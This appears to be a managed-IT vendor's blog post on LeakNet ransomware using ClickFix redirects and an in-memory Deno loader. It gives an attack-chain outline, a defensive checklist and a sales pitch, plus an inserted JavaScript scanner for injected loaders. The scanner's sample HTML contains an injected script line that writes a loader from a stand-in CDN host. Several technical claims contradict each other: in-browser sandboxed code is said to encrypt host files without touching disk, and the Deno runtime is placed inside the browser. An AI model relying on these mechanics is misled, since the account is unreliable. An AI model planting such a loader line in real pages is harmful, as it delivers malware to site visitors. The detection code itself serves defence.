LeakNet ransomware has resurfaced with a new tactic that combines ClickFix redirection through compromised websites and an in‑memory Deno loader, marking a shift toward file‑less attacks that evade traditional defenses. Threat actors are leveraging legitimate web traffic to deliver malicious payloads, making detection increasingly challenging for SOC teams.

Technical Deep‑Dive: How the ClickFix Chain Operates

The ClickFix technique exploits a family of browser‑side scripts that respond to specific user interactions (such as scrolling or mouse movement) with dynamically generated JavaScript. When a victim lands on a compromised page, the script triggers a hidden redirect to a malicious landing site controlled by the attackers. This redirection occurs without any visible navigation, preserving stealth.

The chain proceeds in four stages:

  • Stage 1 – Web‑based downloader: A lightweight HTML file loads a secondary script that fetches a compressed blob from a remote server.
  • Stage 2 – In‑memory Decompression: The blob contains an encrypted Deno script that is decompressed directly into RAM.
  • Stage 3 – Deno Execution: The Deno runtime interprets the script, spawning a network‑connected process that establishes Command‑and‑Control (C2) communication.
  • Stage 4 – Ransomware Payload: LeakNet encrypts files on the compromised host, appending a unique extension and dropping a ransom note.

Because the entire chain resides only in memory, forensic analysts struggle to locate artifacts on disk, increasing the difficulty of post‑incident analysis.

How Compromised Websites Serve LeakNet and Deno

Attackers typically gain initial foothold by exploiting vulnerable CMS plugins, outdated server‑side scripts, or misconfigured cloud storage buckets. Once breached, they inject the ClickFix script into legitimate pages, often disguising it as a performance‑optimization module.

The injected script leverages document.write and eval to load remote resources without triggering CSP (Content‑Security‑Policy) alerts. By hosting the malicious script on a separate CDN, the attackers can scale their infrastructure and evade blacklist detection.

When a visitor’s browser executes the script, it silently initiates a GET request for the encrypted Deno payload. The payload is fetched over HTTPS, making traffic appear legitimate. Subsequent execution occurs entirely within the browser’s JavaScript sandbox, allowing the ransomware to pivot to credential theft or file encryption without ever touching the file system.
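One way for a site owner to catch the injection pattern described above is to scan the HTML the server actually serves for inline scripts that use eval()/document.write() to pull a remote resource, and for external scripts from origins outside an allowlist. This is an added example, not code from the original article or from LeakNet; the sample HTML, hostnames and allowlist are constructed for illustration.

```javascript
// Added example, not code from the original article: a defender-side scan of
// the HTML a site serves, looking for inline scripts that use
// eval()/document.write() to pull a remote resource and for external scripts
// from origins outside the site's allowlist. All hostnames are constructed.

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const SRC_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;
const REMOTE_URL_RE = /https?:\/\/[^\s"'<>]+/i;
const DYNAMIC_SINKS = [/\beval\s*\(/, /\bdocument\.write(ln)?\s*\(/, /\bnew\s+Function\s*\(/];

// Scan one HTML document; pageUrl resolves relative and protocol-relative src values.
function scanPageScripts(html, pageUrl, allowedOrigins) {
  const findings = [];
  let m;
  while ((m = SCRIPT_RE.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = SRC_RE.exec(attrs);
    if (src) {
      // External script: flag only origins that are not on the allowlist.
      let origin = 'invalid';
      try { origin = new URL(src[1], pageUrl).origin; } catch (e) { /* keep 'invalid' */ }
      if (!allowedOrigins.includes(origin)) {
        findings.push({ kind: 'external-script-unknown-origin', detail: src[1] });
      }
    } else if (DYNAMIC_SINKS.some((re) => re.test(body)) && REMOTE_URL_RE.test(body)) {
      // Inline script: a dynamic-code sink combined with a remote URL.
      findings.push({ kind: 'inline-dynamic-loader', detail: REMOTE_URL_RE.exec(body)[0] });
    }
  }
  return findings;
}

// Constructed sample: one legitimate script, one injected "performance module"
// that waits for a scroll event before writing a remote loader, and one
// protocol-relative script from an unknown CDN.
const SAMPLE_HTML = `<html><head>
<script src="https://cdn.example-site.invalid/app.js"></script>
<script>
  document.addEventListener('scroll', function () {
    document.write('<script src="https://perf-cdn.invalid/opt.js">');
  }, { once: true });
</script>
<script src="//static.perf-cdn.invalid/loader.js"></script>
</head><body></body></html>`;

const ALLOWED_SCRIPT_ORIGINS = ['https://cdn.example-site.invalid'];
console.log(scanPageScripts(SAMPLE_HTML, 'https://example-site.invalid/', ALLOWED_SCRIPT_ORIGINS));
```

Run it against a periodic fetch of each public page and alert on any finding, since a legitimate deploy should change the allowlist, not trip the scan.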

Impact on Modern Organizations

The shift to file‑less, browser‑resident attacks has profound implications for enterprises:

  • Increased Attack Surface: Every external website a user visits becomes a potential entry point.
  • Reduced Visibility: Traditional endpoint detection tools often miss in‑memory activity, leading to slower incident response.
  • Higher Remediation Costs: Because the malware can persist across sessions and evade logging, recovery times lengthen, and operational downtime can be significant.
  • Reputational Damage: A successful breach can erode customer trust, especially if sensitive data is exfiltrated during the ransomware phase.

For IT leaders, the incident underscores the necessity of layered defenses that extend beyond signature‑based detection.

Actionable Defensive Measures – Checklist for IT Administrators

Implement the following steps to reduce risk and improve resilience:

  1. Web Application Firewall (WAF) Hardening: Deploy a WAF that inspects for suspicious JavaScript patterns and blocks known ClickFix signatures.
  2. Content‑Security‑Policy Enforcement: Enable strict CSP headers that disallow inline scripts and eval usage, forcing external resources to be loaded from trusted origins.
  3. Network Segmentation: Isolate critical systems and restrict outbound traffic to only whitelisted domains.
  4. Browser Isolation & Sandboxing: Deploy enterprise browsers with integrated isolation layers that contain potentially malicious scripts.
  5. Endpoint Detection & Response (EDR) Tuning: Configure EDR to monitor for anomalous JavaScript execution and in‑memory anomalies.
  6. Threat Intelligence Integration: Feed threat‑intelligence lists of domains associated with ClickFix redirection into SIEM correlation rules.
  7. User Awareness Training: Educate end‑users on the dangers of visiting unknown sites and the signs of hidden redirects.
  8. Regular Patch Management: Keep CMS platforms, plugins, and server software up to date to eliminate the initial compromise vector.

By systematically applying these controls, organizations can significantly reduce the likelihood of a successful LeakNet infection.

Why Professional IT Management Elevates Security Posture

Engaging seasoned security practitioners provides several strategic advantages:

  • Proactive Threat Hunting: Experts continuously scan for emerging techniques such as ClickFix before they manifest in the wild.
  • Tailored Incident Response: Custom playbooks accelerate containment, limiting lateral movement and data loss.
  • Compliance Alignment: Professional managers ensure that security controls map to industry regulations, reducing audit risk.
  • Technology Roadmaps: They recommend investments in next‑generation defenses (e.g., zero‑trust browsers) that future‑proof the environment.

In short, a partnership with experienced IT service providers transforms reactive security into a strategic, resilient capability that protects both data and brand reputation.

Need Expert IT Advice?

Talk to TH247 today about how we can help your small business with professional IT solutions, custom support, and managed infrastructure.